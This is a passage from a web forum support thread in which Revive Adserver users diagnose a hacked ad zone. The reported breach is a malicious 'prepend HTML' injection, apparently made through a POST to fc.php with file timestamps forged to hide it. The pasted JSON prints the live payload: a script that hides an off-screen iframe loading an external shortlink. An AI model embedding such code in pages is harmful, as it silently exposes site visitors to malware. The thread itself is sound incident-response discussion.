Jump to content

revive Asynchronous JS hacked

Recommended Posts

Google AdWords has reported that malware/unwanted content is being distributed on our website.

It's created with JavaScript which is hidden (along with the CSS that hides the iframe) in the HTML for the the skyscraper ad on the right; that HTML is itself embedded in JSON that's loaded asynchronously. The offending code is just:


If you follow that goo.gl URL, it takes you to the bags site, and all subsequent badness comes from garbage that is itself embedded in there.

I found out that it is Revive's fault, because probably via Asynchronous JS the following code was inserted in the field "Always prepend the following HTML code to banners displayed by this zone". It's in the output from "www/delivery/asyncspc.php" which is JSON fetched asynchronously (via XMLHttpRequest) and returns:

    "revive-0-0": {
        "html": "<a href='https://rev.contractoruk.com/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=35dbefdc15__oadest=https%3A%2F%2Fwww.contractoruk.com%2FClickTrack%2Fredirect.php%3Ftarget%3Dhttps%3A%2F%2Fwww.intouchaccounting.com%2Fjoinintouch%2F%26source%3Dforum%2Cleaderboard' target='_blank'><img src='https://rev.contractoruk.com/www/images/6461024dbdede6b423ea67fe31f9eacb.gif' width='728' height='90' alt='inTouch Accounting' title='inTouch Accounting' border='0' /></a><div id='beacon_35dbefdc15' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://rev.contractoruk.com/www/delivery/lg.php?bannerid=3&amp;campaignid=2&amp;zoneid=1&amp;loc=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2F&amp;referer=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2Fgeneral%2F121881-monday-links-bench-vol-ccclxxxviii.html&amp;cb=35dbefdc15' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>",
        "width": "728",
        "height": "90",
        "iframeFriendly": false
    "revive-0-1": {
        "html": "<style>#ifr_ads_banners{width:1600px;height:800px;position:absolute;left:-9985px;}</style><script>(function(d,e,g){g=d.createElement(e);g.src='//goo.gl/Cp8ciT';g.id='ifr_ads_banners';d.body.appendChild(g);})(document,'iframe');</script><a href='https://rev.contractoruk.com/www/delivery/ck.php?oaparams=2__bannerid=4__zoneid=2__cb=e21e133ee8__oadest=https%3A%2F%2Fwww.contractoruk.com%2FClickTrack%2Fredirect.php%3Ftarget%3Dhttps%3A%2F%2Fwww.intouchaccounting.com%2Fjoinintouch%2F%26source%3Dforum%2Cskyscraper' target='_blank'><img src='https://rev.contractoruk.com/www/images/7cb73f87f1f449519d2e2b8832fbd2ae.gif' width='160' height='600' alt='inTouch Accounting' title='inTouch Accounting' border='0' /></a><div id='beacon_e21e133ee8' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://rev.contractoruk.com/www/delivery/lg.php?bannerid=4&amp;campaignid=2&amp;zoneid=2&amp;loc=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2F&amp;referer=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2Fgeneral%2F121881-monday-links-bench-vol-ccclxxxviii.html&amp;cb=e21e133ee8' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>",
        "width": "160",
        "height": "600",
        "iframeFriendly": false

I could fix that by removing the checkbox "Prepend/Append even if no banner delivered" and the code in that field. But I have no idea how that could happend. Because the passwords are save. And if the hacker had hacked the password, they would change more than only this not?

I'm using Revive Adserver v4.1.3 and I've already seen if an update to 4.1.4 would help. But there are no security updates in the release notes https://github.com/revive-adserver/revive-adserver/blob/v4.1.4/RELEASE_NOTES.txt.

Thank you for any inputs.

Share this post

Link to post
Share on other sites

Thank you.

So according to

is removing that line of code the solution? Strange thing is, that every file is from the feburary 2018 (when I did the update).

So if a file get modified then must changed the timestamp too?

Share this post

Link to post
Share on other sites

Yes. Timestamps has been changed as well. You can use linux commd "stat" to see the modification and change time stamps. Attacker is changing "modification time" to parent folder "modification time" so as not to raise suspicion

This code is inserted via a POST call to fc.php. To avoid to be reinfected you can change write permisions on "plugins/bannerTypeText/oxText/genericText.delivery.php".

Perhaps some revive developer can tell us, what is the function of fc.php (front controller) to decide if we can disable it or not.

Share this post

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now